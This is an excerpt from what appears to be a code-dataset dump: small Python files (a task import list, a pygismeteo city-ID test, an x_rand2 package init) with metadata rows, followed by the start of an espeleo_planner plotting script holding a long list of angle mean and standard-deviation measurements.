2021-10-06T07:09:07.000Z
|
def task_imports():
return ['ckanext.ytp.tasks', 'ckanext.ytp.tasks']
| 18.75
| 53
| 0.68
| 10
| 75
| 5
| 0.7
| 0.4
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 75
| 3
| 54
| 25
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0.459459
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0.5
| 0.5
| 1.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
a01681e0835259d3c759cdf45430f1f56f5b6762
| 150
|
py
|
Python
|
tests/test_get_id_by_query.py
|
monosans/pygismeteo
|
f6238ffd7811aefa3366b73c6c082395682b3d27
|
[
"MIT"
] | 5
|
2021-11-12T21:58:42.000Z
|
2021-12-25T11:40:27.000Z
|
tests/test_get_id_by_query.py
|
monosans/pygismeteo
|
f6238ffd7811aefa3366b73c6c082395682b3d27
|
[
"MIT"
] | 16
|
2021-11-15T17:52:54.000Z
|
2022-03-25T15:26:28.000Z
|
tests/test_get_id_by_query.py
|
monosans/pygismeteo
|
f6238ffd7811aefa3366b73c6c082395682b3d27
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from pygismeteo import Gismeteo
def test_get_id_by_query() -> None:
assert Gismeteo().get_id_by_query("Москва") == 4368
| 21.428571
| 55
| 0.693333
| 22
| 150
| 4.409091
| 0.772727
| 0.103093
| 0.14433
| 0.247423
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03937
| 0.153333
| 150
| 6
| 56
| 25
| 0.724409
| 0.14
| 0
| 0
| 0
| 0
| 0.047244
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4e6bb1966f5fc0f8ad3e798d466f71a7d6a4d01f
| 167
|
py
|
Python
|
x_rand2/__init__.py
|
connor-makowski/x_rand
|
e9e6faae8c4f004aebcfea2b3483031695c7ed3d
|
[
"MIT"
] | 2
|
2021-02-02T17:31:14.000Z
|
2021-02-17T21:33:18.000Z
|
x_rand2/__init__.py
|
connor-makowski/x_rand
|
e9e6faae8c4f004aebcfea2b3483031695c7ed3d
|
[
"MIT"
] | null | null | null |
x_rand2/__init__.py
|
connor-makowski/x_rand
|
e9e6faae8c4f004aebcfea2b3483031695c7ed3d
|
[
"MIT"
] | null | null | null |
import sys
if sys.version_info[0] == 3:
from x_rand2.x_rand import x_rand, x_rand_admin
elif sys.version_info[0] < 3:
from x_rand2 import x_rand, x_rand_admin
| 27.833333
| 51
| 0.748503
| 34
| 167
| 3.352941
| 0.382353
| 0.219298
| 0.245614
| 0.263158
| 0.824561
| 0.824561
| 0.45614
| 0.45614
| 0
| 0
| 0
| 0.043165
| 0.167665
| 167
| 5
| 52
| 33.4
| 0.776978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
4e76cdfc116a71e3363fd49a9efeb6f2b51ebbe8
| 76,672
|
py
|
Python
|
espeleo_planner/test/scripts/plot_neighbour_angle_std_histogram.py
|
ITVRoC/espeleo_planner
|
f29d01c09aba339a30a76d05e80641181172ec8a
|
[
"MIT"
] | 6
|
2021-06-14T12:53:06.000Z
|
2021-11-12T01:14:43.000Z
|
espeleo_planner/test/scripts/plot_neighbour_angle_std_histogram.py
|
ITVRoC/espeleo_planner
|
f29d01c09aba339a30a76d05e80641181172ec8a
|
[
"MIT"
] | null | null | null |
espeleo_planner/test/scripts/plot_neighbour_angle_std_histogram.py
|
ITVRoC/espeleo_planner
|
f29d01c09aba339a30a76d05e80641181172ec8a
|
[
"MIT"
] | 2
|
2021-09-17T06:58:23.000Z
|
2022-03-02T12:15:29.000Z
|
#! /usr/bin/python
import matplotlib.pyplot as plt
import numpy as np
measurements_mean_std = [
[14.580862047474623, 6.075320512048607],
[17.15034588213487, 6.013297305587326],
[17.40712445864718, 6.0786148727775835],
[10.997665027116431, 5.122087565285087],
[9.083403326029671, 4.36430118910945],
[8.807800893220461, 3.5521659564820025],
[13.810979490746323, 5.502056760777586],
[12.184675001512177, 5.239194812480995],
[9.466254501175204, 3.8184797117274356],
[17.15034588213487, 6.013297305587326],
[17.40712445864718, 6.0786148727775835],
[14.580862047474623, 6.075320512048607],
[8.807800893220461, 3.5521659564820025],
[8.537576561493351, 3.80529051679574],
[13.810979490746323, 5.502056760777586],
[9.083403326029671, 4.36430118910945],
[9.466254501175204, 3.8184797117274356],
[12.080015421555425, 5.049617522440796],
[9.928680899438294, 6.035107559394114],
[12.853507659807189, 5.785539998056296],
[14.580862047474623, 6.075320512048607],
[8.807800893220461, 3.5521659564820025],
[11.587112662074224, 6.358617831738943],
[10.2399295321238, 4.481189072402238],
[9.083403326029671, 4.36430118910945],
[12.184675001512177, 5.239194812480995],
[12.080015421555425, 5.049617522440796],
[9.928680899438294, 6.035107559394114],
[12.853507659807189, 5.785539998056296],
[14.580862047474623, 6.075320512048607],
[6.476501957957835, 4.8132321274246],
[8.537576561493351, 3.80529051679574],
[8.807800893220461, 3.5521659564820025],
[11.587112662074224, 6.358617831738943],
[10.2399295321238, 4.481189072402238],
[12.184675001512177, 5.239194812480995],
[9.466254501175204, 3.8184797117274356],
[8.091186464752749, 6.136296389022805],
[7.852704754906792, 4.343768201209051],
[8.670163964741999, 4.633257877869705],
[6.3210685917865375, 4.3368878948732315],
[8.870442861535144, 6.177832505416414],
[6.079090279988409, 4.148184844804541],
[8.537576561493351, 3.80529051679574],
[8.807800893220461, 3.5521659564820025],
[8.432597172058323, 5.273744677582166],
[9.083403326029671, 4.36430118910945],
[9.928680899438294, 6.035107559394114],
[7.852704754906792, 4.343768201209051],
[8.091186464752749, 6.136296389022805],
[9.359806276911984, 4.391696939018151],
[17.15034588213487, 6.013297305587326],
[17.40712445864718, 6.0786148727775835],
[14.580862047474623, 6.075320512048607],
[8.537576561493351, 3.80529051679574],
[8.807800893220461, 3.5521659564820025],
[12.184675001512177, 5.239194812480995],
[9.928680899438294, 6.035107559394114],
[14.580862047474623, 6.075320512048607],
[8.537576561493351, 3.80529051679574],
[13.810979490746323, 5.502056760777586],
[12.184675001512177, 5.239194812480995],
[9.083403326029671, 4.36430118910945],
[6.476501957957835, 4.8132321274246],
[9.466254501175204, 3.8184797117274356],
[8.091186464752749, 6.136296389022805],
[7.852704754906792, 4.343768201209051],
[9.928680899438294, 6.035107559394114],
[12.853507659807189, 5.785539998056296],
[12.080015421555425, 5.049617522440796],
[9.083403326029671, 4.36430118910945],
[9.466254501175204, 3.8184797117274356],
[11.587112662074224, 6.358617831738943],
[9.928680899438294, 6.035107559394114],
[6.476501957957835, 4.8132321274246],
[9.083403326029671, 4.36430118910945],
[11.508128595950659, 3.5851980362589004],
[8.807800893220461, 3.5521659564820025],
[9.359806276911984, 4.391696939018151],
[13.810979490746323, 5.502056760777586],
[12.184675001512177, 5.239194812480995],
[7.852704754906792, 4.343768201209051],
[8.091186464752749, 6.136296389022805],
[12.107676347618414, 3.5085731094097685],
[8.670163964741999, 4.633257877869705],
[6.3210685917865375, 4.3368878948732315],
[6.02640897943888, 3.916563880181475],
[8.870442861535144, 6.177832505416414],
[5.8339171963263325, 3.677542604399159],
[8.432597172058323, 5.273744677582166],
[6.476501957957835, 4.8132321274246],
[9.359806276911984, 4.391696939018151],
[7.852704754906792, 4.343768201209051],
[8.091186464752749, 6.136296389022805],
[6.365395218692758, 3.981690481898278],
[6.02640897943888, 3.916563880181475],
[8.870442861535144, 6.177832505416414],
[6.079090279988409, 4.148184844804541],
[5.8339171963263325, 3.677542604399159],
[8.432597172058323, 5.273744677582166],
[6.476501957957835, 4.8132321274246],
[8.091186464752749, 6.136296389022805],
[6.365395218692758, 3.981690481898278],
[12.080015421555425, 5.049617522440796],
[12.853507659807189, 5.785539998056296],
[8.870442861535144, 6.177832505416414],
[8.537576561493351, 3.80529051679574],
[8.807800893220461, 3.5521659564820025],
[11.587112662074224, 6.358617831738943],
[10.2399295321238, 4.481189072402238],
[9.083403326029671, 4.36430118910945],
[6.476501957957835, 4.8132321274246],
[9.466254501175204, 3.8184797117274356],
[8.091186464752749, 6.136296389022805],
[7.852704754906792, 4.343768201209051],
[5.665576843540502, 3.3322218039932925],
[6.3210685917865375, 4.3368878948732315],
[6.02640897943888, 3.916563880181475],
[6.365395218692758, 3.981690481898278],
[5.603685695983892, 3.2451075514789007],
[6.079090279988409, 4.148184844804541],
[7.176117324513632, 3.942691925460738],
[7.466702255730219, 4.246506577865299],
[6.883321149103081, 3.7013844629577264],
[8.0310976897579, 4.565308046256245],
[6.3210685917865375, 4.3368878948732315],
[9.928680899438294, 6.035107559394114],
[8.870442861535144, 6.177832505416414],
[6.079090279988409, 4.148184844804541],
[8.537576561493351, 3.80529051679574],
[8.807800893220461, 3.5521659564820025],
[8.432597172058323, 5.273744677582166],
[11.587112662074224, 6.358617831738943],
[9.083403326029671, 4.36430118910945],
[6.476501957957835, 4.8132321274246],
[7.852704754906792, 4.343768201209051],
[5.665576843540502, 3.3322218039932925],
[6.3210685917865375, 4.3368878948732315],
[6.02640897943888, 3.916563880181475],
[5.603685695983892, 3.2451075514789007],
[6.079090279988409, 4.148184844804541],
[5.8339171963263325, 3.677542604399159],
[7.466702255730219, 4.246506577865299],
[8.0310976897579, 4.565308046256245],
[8.670163964741999, 4.633257877869705],
[9.928680899438294, 6.035107559394114],
[11.508128595950659, 3.5851980362589004],
[8.537576561493351, 3.80529051679574],
[8.807800893220461, 3.5521659564820025],
[6.079090279988409, 4.148184844804541],
[6.476501957957835, 4.8132321274246],
[9.083403326029671, 4.36430118910945],
[9.359806276911984, 4.391696939018151],
[8.091186464752749, 6.136296389022805],
[12.107676347618414, 3.5085731094097685],
[5.665576843540502, 3.3322218039932925],
[6.3210685917865375, 4.3368878948732315],
[6.079090279988409, 4.148184844804541],
[7.176117324513632, 3.942691925460738],
[5.8339171963263325, 3.677542604399159],
[6.883321149103081, 3.7013844629577264],
[6.365395218692758, 3.981690481898278],
[7.627730488281269, 3.536913242480221],
[5.8339171963263325, 3.677542604399159],
[5.665576843540502, 3.3322218039932925],
[6.02640897943888, 3.916563880181475],
[6.883321149103081, 3.7013844629577264],
[9.928680899438294, 6.035107559394114],
[12.853507659807189, 5.785539998056296],
[15.0144750900378, 3.0690458860312413],
[11.587112662074224, 6.358617831738943],
[10.2399295321238, 4.481189072402238],
[9.083403326029671, 4.36430118910945],
[9.466254501175204, 3.8184797117274356],
[7.627730488281269, 3.536913242480221],
[5.665576843540502, 3.3322218039932925],
[6.365395218692758, 3.981690481898278],
[7.382275307401952, 3.514762773783933],
[5.8339171963263325, 3.677542604399159],
[8.813658596800783, 4.40731941077611],
[7.466702255730219, 4.246506577865299],
[6.883321149103081, 3.7013844629577264],
[5.132833382217747, 3.156111073426686],
[8.0310976897579, 4.565308046256245],
[4.939032982959074, 2.8272859625441624],
[13.810979490746323, 5.502056760777586],
[17.40712445864718, 6.0786148727775835],
[12.184675001512177, 5.239194812480995],
[14.580862047474623, 6.075320512048607],
[14.230652017983934, 6.391535491200372],
[8.670163964741999, 4.633257877869705],
[6.079090279988409, 4.148184844804541],
[8.537576561493351, 3.80529051679574],
[11.508128595950659, 3.5851980362589004],
[6.476501957957835, 4.8132321274246],
[7.852704754906792, 4.343768201209051],
[11.412256391365355, 3.7206871339538865],
[12.107676347618414, 3.5085731094097685],
[9.359806276911984, 4.391696939018151],
[6.079090279988409, 4.148184844804541],
[11.508128595950659, 3.5851980362589004],
[6.476501957957835, 4.8132321274246],
[7.852704754906792, 4.343768201209051],
[11.412256391365355, 3.7206871339538865],
[7.627730488281269, 3.536913242480221],
[5.665576843540502, 3.3322218039932925],
[4.037928442939495, 2.247534391934304],
[5.603685695983892, 3.2451075514789007],
[7.382275307401952, 3.514762773783933],
[6.03354502067699, 2.1318518082449667],
[8.813658596800783, 4.40731941077611],
[7.466702255730219, 4.246506577865299],
[6.883321149103081, 3.7013844629577264],
[5.132833382217747, 3.156111073426686],
[5.199647262139352, 3.3998805870242608],
[5.665576843540502, 3.3322218039932925],
[5.603685695983892, 3.2451075514789007],
[10.898829990027707, 4.394411988981465],
[5.8339171963263325, 3.677542604399159],
[8.813658596800783, 4.40731941077611],
[7.466702255730219, 4.246506577865299],
[10.814899075379794, 4.388065524750964],
[6.365395218692758, 3.981690481898278],
[7.627730488281269, 3.536913242480221],
[6.02640897943888, 3.916563880181475],
[8.0310976897579, 4.565308046256245],
[5.603685695983892, 3.2451075514789007],
[7.382275307401952, 3.514762773783933],
[7.176117324513632, 3.942691925460738],
[5.8339171963263325, 3.677542604399159],
[7.466702255730219, 4.246506577865299],
[6.883321149103081, 3.7013844629577264],
[5.132833382217747, 3.156111073426686],
[6.365395218692758, 3.981690481898278],
[4.939032982959074, 2.8272859625441624],
[9.928680899438294, 6.035107559394114],
[11.587112662074224, 6.358617831738943],
[12.080015421555425, 5.049617522440796],
[10.2399295321238, 4.481189072402238],
[9.083403326029671, 4.36430118910945],
[9.466254501175204, 3.8184797117274356],
[9.928680899438294, 6.035107559394114],
[6.079090279988409, 4.148184844804541],
[8.432597172058323, 5.273744677582166],
[11.587112662074224, 6.358617831738943],
[6.476501957957835, 4.8132321274246],
[6.3210685917865375, 4.3368878948732315],
[8.091186464752749, 6.136296389022805],
[5.603685695983892, 3.2451075514789007],
[10.898829990027707, 4.394411988981465],
[7.466702255730219, 4.246506577865299],
[10.814899075379794, 4.388065524750964],
[8.0310976897579, 4.565308046256245],
[4.939032982959074, 2.8272859625441624],
[5.665576843540502, 3.3322218039932925],
[8.0310976897579, 4.565308046256245],
[5.603685695983892, 3.2451075514789007],
[10.898829990027707, 4.394411988981465],
[5.8339171963263325, 3.677542604399159],
[8.813658596800783, 4.40731941077611],
[10.814899075379794, 4.388065524750964],
[6.365395218692758, 3.981690481898278],
[4.939032982959074, 2.8272859625441624],
[7.627730488281269, 3.536913242480221],
[5.665576843540502, 3.3322218039932925],
[4.037928442939495, 2.247534391934304],
[5.603685695983892, 3.2451075514789007],
[7.382275307401952, 3.514762773783933],
[7.6940868267500635, 3.550772075193317],
[6.03354502067699, 2.1318518082449667],
[8.21144142645822, 3.37666183586836],
[6.883321149103081, 3.7013844629577264],
[5.199647262139352, 3.3998805870242608],
[4.939032982959074, 2.8272859625441624],
[9.928680899438294, 6.035107559394114],
[12.853507659807189, 5.785539998056296],
[8.870442861535144, 6.177832505416414],
[12.080015421555425, 5.049617522440796],
[10.2399295321238, 4.481189072402238],
[9.083403326029671, 4.36430118910945],
[9.466254501175204, 3.8184797117274356],
[8.091186464752749, 6.136296389022805],
[6.018242339961669, 2.455006569825223],
[6.221065720140407, 1.8444794858743812],
[4.939032982959074, 2.8272859625441624],
[4.433117324180472, 1.9414418755023324],
[6.441820784103897, 1.8297149833490693],
[7.6940868267500635, 3.550772075193317],
[7.416175074176887, 3.469293325351635],
[6.03354502067699, 2.1318518082449667],
[6.025832875175962, 3.7292527992755335],
[5.132833382217747, 3.156111073426686],
[5.199647262139352, 3.3998805870242608],
[4.712625210940835, 2.9014826657868547],
[3.5385747281300692, 1.9677218437260573],
[4.939032982959074, 2.8272859625441624],
[4.037928442939495, 2.247534391934304],
[7.382275307401952, 3.514762773783933],
[7.6940868267500635, 3.550772075193317],
[7.416175074176887, 3.469293325351635],
[6.03354502067699, 2.1318518082449667],
[6.025832875175962, 3.7292527992755335],
[8.21144142645822, 3.37666183586836],
[5.132833382217747, 3.156111073426686],
[4.712625210940835, 2.9014826657868547],
[3.5385747281300692, 1.9677218437260573],
[7.627730488281269, 3.536913242480221],
[5.665576843540502, 3.3322218039932925],
[6.02640897943888, 3.916563880181475],
[5.603685695983892, 3.2451075514789007],
[7.382275307401952, 3.514762773783933],
[7.176117324513632, 3.942691925460738],
[5.8339171963263325, 3.677542604399159],
[5.132833382217747, 3.156111073426686],
[4.939032982959074, 2.8272859625441624],
[17.15034588213487, 6.013297305587326],
[6.018242339961669, 2.455006569825223],
[6.221065720140407, 1.8444794858743812],
[4.433117324180472, 1.9414418755023324],
[4.037928442939495, 2.247534391934304],
[6.441820784103897, 1.8297149833490693],
[7.6940868267500635, 3.550772075193317],
[7.416175074176887, 3.469293325351635],
[6.03354502067699, 2.1318518082449667],
[6.025832875175962, 3.7292527992755335],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[5.057383822940272, 3.417585900052888],
[5.199647262139352, 3.3998805870242608],
[4.712625210940835, 2.9014826657868547],
[6.221065720140407, 1.8444794858743812],
[7.817292084856258, 3.0485450300896595],
[4.037928442939495, 2.247534391934304],
[3.1990871251820026, 3.6130256259877207],
[6.441820784103897, 1.8297149833490693],
[6.03354502067699, 2.1318518082449667],
[4.433117324180472, 1.9414418755023324],
[3.8285647411742985, 1.878975582108213],
[7.060678719911859, 3.618460185670135],
[6.384641291520963, 1.736955799614506],
[3.5385747281300692, 1.9677218437260573],
[6.018242339961669, 2.455006569825223],
[6.221065720140407, 1.8444794858743812],
[4.433117324180472, 1.9414418755023324],
[4.037928442939495, 2.247534391934304],
[6.441820784103897, 1.8297149833490693],
[5.132833382217747, 3.156111073426686],
[5.199647262139352, 3.3998805870242608],
[4.939032982959074, 2.8272859625441624],
[3.5385747281300692, 1.9677218437260573],
[8.670163964741999, 4.633257877869705],
[9.359806276911984, 4.391696939018151],
[8.537576561493351, 3.80529051679574],
[7.852704754906792, 4.343768201209051],
[11.412256391365355, 3.7206871339538865],
[12.107676347618414, 3.5085731094097685],
[5.057383822940272, 3.417585900052888],
[6.221065720140407, 1.8444794858743812],
[7.817292084856258, 3.0485450300896595],
[4.037928442939495, 2.247534391934304],
[3.1990871251820026, 3.6130256259877207],
[6.441820784103897, 1.8297149833490693],
[6.018242339961669, 2.455006569825223],
[6.03354502067699, 2.1318518082449667],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[7.060678719911859, 3.618460185670135],
[4.712625210940835, 2.9014826657868547],
[3.5385747281300692, 1.9677218437260573],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[4.433117324180472, 1.9414418755023324],
[4.037928442939495, 2.247534391934304],
[7.6940868267500635, 3.550772075193317],
[7.416175074176887, 3.469293325351635],
[6.025832875175962, 3.7292527992755335],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[7.139919695904992, 6.091186677843476],
[6.27221015926113, 4.480818515169627],
[5.199647262139352, 3.3998805870242608],
[3.5385747281300692, 1.9677218437260573],
[4.037928442939495, 2.247534391934304],
[7.382275307401952, 3.514762773783933],
[7.416175074176887, 3.469293325351635],
[6.025832875175962, 3.7292527992755335],
[8.21144142645822, 3.37666183586836],
[5.132833382217747, 3.156111073426686],
[5.199647262139352, 3.3998805870242608],
[4.712625210940835, 2.9014826657868547],
[3.5385747281300692, 1.9677218437260573],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[9.313523271207726, 7.409010602010248],
[7.930783504041922, 6.31551486280533],
[6.025832875175962, 3.7292527992755335],
[6.27221015926113, 4.480818515169627],
[4.712625210940835, 2.9014826657868547],
[17.15034588213487, 6.013297305587326],
[14.580862047474623, 6.075320512048607],
[16.602567350873077, 8.029388325380623],
[13.810979490746323, 5.502056760777586],
[15.499752594717432, 8.228672599384055],
[12.184675001512177, 5.239194812480995],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[7.416175074176887, 3.469293325351635],
[6.025832875175962, 3.7292527992755335],
[7.139919695904992, 6.091186677843476],
[4.712625210940835, 2.9014826657868547],
[10.898829990027707, 4.394411988981465],
[8.670163964741999, 4.633257877869705],
[9.359806276911984, 4.391696939018151],
[12.107676347618414, 3.5085731094097685],
[11.508128595950659, 3.5851980362589004],
[6.018242339961669, 2.455006569825223],
[7.817292084856258, 3.0485450300896595],
[3.1990871251820026, 3.6130256259877207],
[2.6157741915651846, 3.1088022135528464],
[5.425993469713776, 2.3674151211798176],
[4.433117324180472, 1.9414418755023324],
[4.712625210940835, 2.9014826657868547],
[4.459870001832672, 1.7285677118659897],
[5.057383822940272, 3.417585900052888],
[5.483181079034119, 3.3932092599533696],
[7.060678719911859, 3.618460185670135],
[3.5385747281300692, 1.9677218437260573],
[6.018242339961669, 2.455006569825223],
[4.433117324180472, 1.9414418755023324],
[7.648743254380252, 3.257370873095939],
[2.6157741915651846, 3.1088022135528464],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[3.6755430287090185, 2.4658558409523934],
[5.425993469713776, 2.3674151211798176],
[5.483181079034119, 3.3932092599533696],
[7.060678719911859, 3.618460185670135],
[7.817292084856258, 3.0485450300896595],
[7.627730488281269, 3.536913242480221],
[7.382275307401952, 3.514762773783933],
[7.6940868267500635, 3.550772075193317],
[7.416175074176887, 3.469293325351635],
[5.132833382217747, 3.156111073426686],
[5.199647262139352, 3.3998805870242608],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[4.037928442939495, 2.247534391934304],
[7.6940868267500635, 3.550772075193317],
[7.416175074176887, 3.469293325351635],
[7.139919695904992, 6.091186677843476],
[6.27221015926113, 4.480818515169627],
[5.199647262139352, 3.3998805870242608],
[4.712625210940835, 2.9014826657868547],
[3.5385747281300692, 1.9677218437260573],
[6.981801980351727, 5.790295382573812],
[7.469449854326634, 5.159645256391554],
[5.926847062929005, 2.550077789090704],
[7.930783504041922, 6.31551486280533],
[6.025832875175962, 3.7292527992755335],
[5.425993469713776, 2.3674151211798176],
[4.433117324180472, 1.9414418755023324],
[4.712625210940835, 2.9014826657868547],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[7.139919695904992, 6.091186677843476],
[6.27221015926113, 4.480818515169627],
[6.425951539197719, 3.4605904466592117],
[3.5385747281300692, 1.9677218437260573],
[7.627730488281269, 3.536913242480221],
[5.665576843540502, 3.3322218039932925],
[5.603685695983892, 3.2451075514789007],
[7.6940868267500635, 3.550772075193317],
[8.21144142645822, 3.37666183586836],
[6.883321149103081, 3.7013844629577264],
[5.132833382217747, 3.156111073426686],
[5.199647262139352, 3.3998805870242608],
[4.939032982959074, 2.8272859625441624],
[8.206988166321013, 2.7538312138050416],
[3.6755430287090185, 2.4658558409523934],
[7.648743254380252, 3.257370873095939],
[3.1990871251820026, 3.6130256259877207],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[5.483181079034119, 3.3932092599533696],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[7.583569459571693, 2.9678320131795166],
[5.425993469713776, 2.3674151211798176],
[6.073933436884495, 2.5749648755014114],
[7.060678719911859, 3.618460185670135],
[8.870442861535144, 6.177832505416414],
[6.476501957957835, 4.8132321274246],
[8.091186464752749, 6.136296389022805],
[6.3210685917865375, 4.3368878948732315],
[6.079090279988409, 4.148184844804541],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[7.469449854326634, 5.159645256391554],
[5.926847062929005, 2.550077789090704],
[3.1990871251820026, 3.6130256259877207],
[7.930783504041922, 6.31551486280533],
[2.6157741915651846, 3.1088022135528464],
[5.425993469713776, 2.3674151211798176],
[4.433117324180472, 1.9414418755023324],
[4.712625210940835, 2.9014826657868547],
[3.8285647411742985, 1.878975582108213],
[5.483181079034119, 3.3932092599533696],
[6.425951539197719, 3.4605904466592117],
[3.5385747281300692, 1.9677218437260573],
[8.537576561493351, 3.80529051679574],
[7.852704754906792, 4.343768201209051],
[9.359806276911984, 4.391696939018151],
[11.412256391365355, 3.7206871339538865],
[11.508128595950659, 3.5851980362589004],
[6.018242339961669, 2.455006569825223],
[7.817292084856258, 3.0485450300896595],
[7.648743254380252, 3.257370873095939],
[3.1990871251820026, 3.6130256259877207],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[3.8285647411742985, 1.878975582108213],
[2.6157741915651846, 3.1088022135528464],
[3.6755430287090185, 2.4658558409523934],
[4.433117324180472, 1.9414418755023324],
[8.206988166321013, 2.7538312138050416],
[6.024029708789503, 2.7765971408513765],
[6.805877015325792, 1.5925707515038552],
[2.6157741915651846, 3.1088022135528464],
[7.648743254380252, 3.257370873095939],
[3.1990871251820026, 3.6130256259877207],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[4.765886863174591, 2.2246421206661733],
[7.583569459571693, 2.9678320131795166],
[5.435836143120371, 2.8043480606961375],
[6.073933436884495, 2.5749648755014114],
[5.483181079034119, 3.3932092599533696],
[7.060678719911859, 3.618460185670135],
[6.018242339961669, 2.455006569825223],
[7.817292084856258, 3.0485450300896595],
[4.037928442939495, 2.247534391934304],
[6.441820784103897, 1.8297149833490693],
[6.03354502067699, 2.1318518082449667],
[4.433117324180472, 1.9414418755023324],
[6.384641291520963, 1.736955799614506],
[3.5385747281300692, 1.9677218437260573],
[4.037928442939495, 2.247534391934304],
[7.6940868267500635, 3.550772075193317],
[6.025832875175962, 3.7292527992755335],
[8.21144142645822, 3.37666183586836],
[6.27221015926113, 4.480818515169627],
[5.199647262139352, 3.3998805870242608],
[4.712625210940835, 2.9014826657868547],
[3.5385747281300692, 1.9677218437260573],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[7.469449854326634, 5.159645256391554],
[5.926847062929005, 2.550077789090704],
[9.313523271207726, 7.409010602010248],
[5.425993469713776, 2.3674151211798176],
[4.459870001832672, 1.7285677118659897],
[7.139919695904992, 6.091186677843476],
[6.425951539197719, 3.4605904466592117],
[5.057383822940272, 3.417585900052888],
[7.469449854326634, 5.159645256391554],
[5.926847062929005, 2.550077789090704],
[9.313523271207726, 7.409010602010248],
[7.930783504041922, 6.31551486280533],
[5.425993469713776, 2.3674151211798176],
[4.712625210940835, 2.9014826657868547],
[4.459870001832672, 1.7285677118659897],
[7.139919695904992, 6.091186677843476],
[6.27221015926113, 4.480818515169627],
[6.425951539197719, 3.4605904466592117],
[6.025832875175962, 3.7292527992755335],
[15.006366271051672, 4.232282823070333],
[5.435836143120371, 2.8043480606961375],
[3.6755430287090185, 2.4658558409523934],
[6.805877015325792, 1.5925707515038552],
[2.6157741915651846, 3.1088022135528464],
[7.648743254380252, 3.257370873095939],
[15.272869558340066, 5.179633920566634],
[3.1990871251820026, 3.6130256259877207],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[7.060678719911859, 3.618460185670135],
[9.436127302593512, 5.541398982964392],
[4.765886863174591, 2.2246421206661733],
[6.024029708789503, 2.7765971408513765],
[6.073933436884495, 2.5749648755014114],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[7.469449854326634, 5.159645256391554],
[7.42290814377523, 2.4182881151332105],
[6.633316773597083, 2.460443387674774],
[3.1990871251820026, 3.6130256259877207],
[7.930783504041922, 6.31551486280533],
[2.6157741915651846, 3.1088022135528464],
[8.09611116766466, 2.3148350927200396],
[5.926847062929005, 2.550077789090704],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[7.583569459571693, 2.9678320131795166],
[5.483181079034119, 3.3932092599533696],
[6.425951539197719, 3.4605904466592117],
[8.206988166321013, 2.7538312138050416],
[7.42290814377523, 2.4182881151332105],
[5.926847062929005, 2.550077789090704],
[6.633316773597083, 2.460443387674774],
[3.1990871251820026, 3.6130256259877207],
[2.6157741915651846, 3.1088022135528464],
[5.425993469713776, 2.3674151211798176],
[8.09611116766466, 2.3148350927200396],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[7.583569459571693, 2.9678320131795166],
[6.073933436884495, 2.5749648755014114],
[3.6755430287090185, 2.4658558409523934],
[8.813658596800783, 4.40731941077611],
[7.466702255730219, 4.246506577865299],
[8.0310976897579, 4.565308046256245],
[11.412256391365355, 3.7206871339538865],
[10.814899075379794, 4.388065524750964],
[6.018242339961669, 2.455006569825223],
[6.221065720140407, 1.8444794858743812],
[4.433117324180472, 1.9414418755023324],
[4.037928442939495, 2.247534391934304],
[6.03354502067699, 2.1318518082449667],
[6.384641291520963, 1.736955799614506],
[3.5385747281300692, 1.9677218437260573],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[7.469449854326634, 5.159645256391554],
[7.42290814377523, 2.4182881151332105],
[6.633316773597083, 2.460443387674774],
[7.930783504041922, 6.31551486280533],
[5.425993469713776, 2.3674151211798176],
[8.09611116766466, 2.3148350927200396],
[4.459870001832672, 1.7285677118659897],
